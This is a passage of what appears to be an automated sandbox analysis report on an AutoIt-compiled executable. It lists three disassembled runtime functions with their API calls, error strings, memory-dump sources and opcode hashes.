                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message_doexit
                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                                                  • Opcode ID: 7c8be2ecd3dd1d464cd8f3bc7ee921786c4dafde57ffa94e7f36882e06a2ac88
                                                                                                                                                  • Instruction ID: 552a0e363e0ec7866df94e38232c25cdd84a9196c6043c0d5141a64fe519ab15
                                                                                                                                                  • Opcode Fuzzy Hash: 7c8be2ecd3dd1d464cd8f3bc7ee921786c4dafde57ffa94e7f36882e06a2ac88
                                                                                                                                                  • Instruction Fuzzy Hash: 29D05B3238535832D26432A96C0FFDE7AC88B05B51F104476FF08B51C34FE699D041D5
                                                                                                                                                  Function 00BFB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BFB544: _memset.LIBCMT ref: 00BFB551
                                                                                                                                                    • Part of subcall function 00BE0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BFB520,?,?,?,00BC100A), ref: 00BE0B79
                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00BC100A), ref: 00BFB524
                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BC100A), ref: 00BFB533
                                                                                                                                                  Strings
                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BFB52E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                  • API String ID: 3158253471-631824599
                                                                                                                                                  • Opcode ID: 4fa7ee9205f4fe365dc3fd9f2aba22ef8d1a1a86ee87bea6fd5d6bf8d96c7aae
                                                                                                                                                  • Instruction ID: 83482f1130663164bac126650ea727f0c92ef8a049abfdeebaeb65850e843c92
                                                                                                                                                  • Opcode Fuzzy Hash: 4fa7ee9205f4fe365dc3fd9f2aba22ef8d1a1a86ee87bea6fd5d6bf8d96c7aae
                                                                                                                                                  • Instruction Fuzzy Hash: 51E092B0210355CFD730AF35E815B167AE0EF14305F148A9DE456C7351EBB8D548CB91
                                                                                                                                                  Function 00C00251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C00091
                                                                                                                                                    • Part of subcall function 00C3C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00C0027A,?), ref: 00C3C6E7
                                                                                                                                                    • Part of subcall function 00C3C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00C0027A,?), ref: 00C3C6F9
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C00289
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                                  • API String ID: 582185067-3257408948
                                                                                                                                                  • Opcode ID: 9e494eb16102877deca767214abff8569dc3741af2638c6b920d60cc6d6b85ce
                                                                                                                                                  • Instruction ID: 818b47130bd6308f6eb416842d7e59e5713b40f4190d3db869df7ad50b62d475
                                                                                                                                                  • Opcode Fuzzy Hash: 9e494eb16102877deca767214abff8569dc3741af2638c6b920d60cc6d6b85ce
                                                                                                                                                  • Instruction Fuzzy Hash: F0F0ED71815509DFCB25DBA1C999BEDBBF8AB48305F350485F146B2190CB714F84DF21